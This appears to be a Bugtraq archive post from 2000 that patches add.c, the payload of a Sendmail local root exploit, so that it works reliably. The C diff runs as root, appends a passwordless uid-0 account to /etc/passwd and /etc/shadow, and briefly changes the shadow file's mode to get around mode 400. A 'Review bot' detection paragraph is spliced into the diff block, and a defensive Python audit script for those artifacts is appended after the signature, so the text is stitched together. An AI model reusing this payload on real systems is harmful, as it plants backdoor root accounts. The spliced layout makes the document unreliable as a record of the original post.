Bugtraq mailing list archives

Re: Sendmail local root exploit on linux 2.2.x


From: pettit () YAHOO-INC COM (Mark K. Pettit)
Date: Thu, 8 Jun 2000 12:18:44 -0700


Hello all,

Attached is a file with 2 sources, ex.c and add.c

This is a great exploit.  It is a little broken, though.  Here's a
patched version of the add.c script so that it is a little kinder and
works out of the box the first time.

The problem has to do with the permissions on the shadow file.  If it's
installed with mode 400, the exploit will fail.  There's also a \n left
out of the shadow line.

This patch fixes both of these problems.  Yah, I know it's trivial, but
I wanted to be complete.

============================================================================
--- add.c.orig  Thu Jun  8 11:32:33 2000
+++ add.c       Thu Jun  8 11:21:15 2000
@@ -1,17 +1,24 @@
 #include <fcntl.h>
+#include <sys/types.h>
+#include <sys/stat.h>
+#include <unistd.h>

 int main (void) {
    int fd;
    char string[40];
+   struct stat buf;

    seteuid(0);
    fd = open("/etc/passwd", O_APPEND|O_WRONLY);
    strcpy(string, "yomama:x:0:0::/root:/bin/sh\n");
    write(fd, string, strlen(string));
    close(fd);
+   stat("/etc/shadow", &buf);
+   chmod("/etc/shadow", S_IRUSR|S_IWUSR);
    fd = open("/etc/shadow", O_APPEND|O_WRONLY);
-   strcpy(string, "yomama::11029:0:99999:7:::");
+   strcpy(string, "yomama::11029:0:99999:7:::\n");
    write(fd, string, strlen(string));
    close(fd);
-
+   chmod("/etc/shadow", buf.st_mode);
 }
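Review bot: the point worth flagging in this hunk is that the `stat`/`chmod` pair around the `/etc/shadow` open exists only to get past a mode-400 shadow file and then puts the original mode back, so the lasting on-disk evidence is the appended `yomama:x:0:0::/root:/bin/sh` entry in `/etc/passwd` and the matching `yomama::11029:0:99999:7:::` line in `/etc/shadow`, whose empty second field means the new uid-0 account has no password at all. A host check that flags any uid-0 account other than root, any shadow entry with an empty password field, and any change to the mode or contents of `/etc/passwd` and `/etc/shadow` surfaces every step of this change; the shadow file should remain mode 400 and owned by root regardless.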
============================================================================


--
Mark K. Pettit, CCNA                Do you, uh, Yahoo!?
pettit () yahoo-inc com             Why, yes, I do, uh, Yahoo!
Technical Yahoo
Yahoo!, Inc., 3420 Central Expressway, Santa Clara, CA 95051
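The post above describes what the patched add.c leaves behind: an extra uid-0 line in /etc/passwd, a shadow line with an empty password field, and (before the patch) a shadow line without its trailing newline. As an added example that is not part of the original post or of the attached sources, the following Python audit parses passwd- and shadow-format text and flags exactly those artifacts. The sample file contents and the `$6$placeholder...` hash strings are constructed, and `audit_files` is a hypothetical helper for pointing the same checks at real files.

```python
"""Audit passwd/shadow content for the artifacts an appended uid-0 account leaves
behind: extra uid-0 entries, passwordless shadow entries, malformed shadow lines
and a shadow file readable by anyone but root."""
import os
import stat

# Constructed sample files (not taken from any real system). The "yomama"
# lines are the ones the patched add.c appends; the hashes are placeholders.
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
alice:x:1000:1000:Alice:/home/alice:/bin/bash
yomama:x:0:0::/root:/bin/sh
"""

SAMPLE_SHADOW = """root:$6$placeholderhash1:11029:0:99999:7:::
daemon:*:11029:0:99999:7:::
alice:$6$placeholderhash2:11029:0:99999:7:::
yomama::11029:0:99999:7:::
"""

# Constructed shadow file where the appended line lacked its newline, so a
# later entry written by another tool ran onto the same line.
SAMPLE_SHADOW_NO_NEWLINE = """root:$6$placeholderhash1:11029:0:99999:7:::
yomama::11029:0:99999:7:::bob:$6$placeholderhash3:11029:0:99999:7:::
"""


def _records(text, nfields):
    """Split colon-separated lines into (well_formed_records, malformed_lines)."""
    good, bad = [], []
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != nfields:
            bad.append(line)          # wrong field count: corrupted or run-on line
        else:
            good.append(fields)
    return good, bad


def extra_uid0_accounts(passwd_text):
    """Names of uid-0 accounts other than root (passwd has 7 fields, uid is field 3)."""
    good, _ = _records(passwd_text, 7)
    return [f[0] for f in good if f[2] == "0" and f[0] != "root"]


def passwordless_accounts(shadow_text):
    """Names whose shadow password field is empty, i.e. no password is required."""
    good, _ = _records(shadow_text, 9)
    return [f[0] for f in good if f[1] == ""]


def malformed_shadow_lines(shadow_text):
    """Shadow lines that do not have exactly 9 fields (e.g. two entries run together)."""
    _, bad = _records(shadow_text, 9)
    return bad


def shadow_mode_exposed(mode):
    """True if group or other hold any permission bit on the shadow file."""
    return bool(mode & (stat.S_IRWXG | stat.S_IRWXO))


def audit(passwd_text, shadow_text, shadow_mode):
    """Run all checks and return the findings as a dict."""
    return {
        "extra_uid0": extra_uid0_accounts(passwd_text),
        "passwordless": passwordless_accounts(shadow_text),
        "malformed_shadow": malformed_shadow_lines(shadow_text),
        "shadow_mode_exposed": shadow_mode_exposed(shadow_mode),
    }


def audit_files(passwd_path="/etc/passwd", shadow_path="/etc/shadow"):
    """Hypothetical helper: run the audit on real files (reading shadow needs root)."""
    with open(passwd_path) as pw, open(shadow_path) as sh:
        mode = stat.S_IMODE(os.fstat(sh.fileno()).st_mode)
        return audit(pw.read(), sh.read(), mode)


if __name__ == "__main__":
    # A mode-400 shadow file combined with the sample contents still yields findings.
    for key, value in audit(SAMPLE_PASSWD, SAMPLE_SHADOW, 0o400).items():
        print(f"{key}: {value}")
    print("run-on shadow lines:", malformed_shadow_lines(SAMPLE_SHADOW_NO_NEWLINE))
```

The checks deliberately key on the final state of the files rather than on the transient chmod, since the patch restores the original mode before exiting; the mode check is there because a shadow file that is not 400 is a finding in its own right.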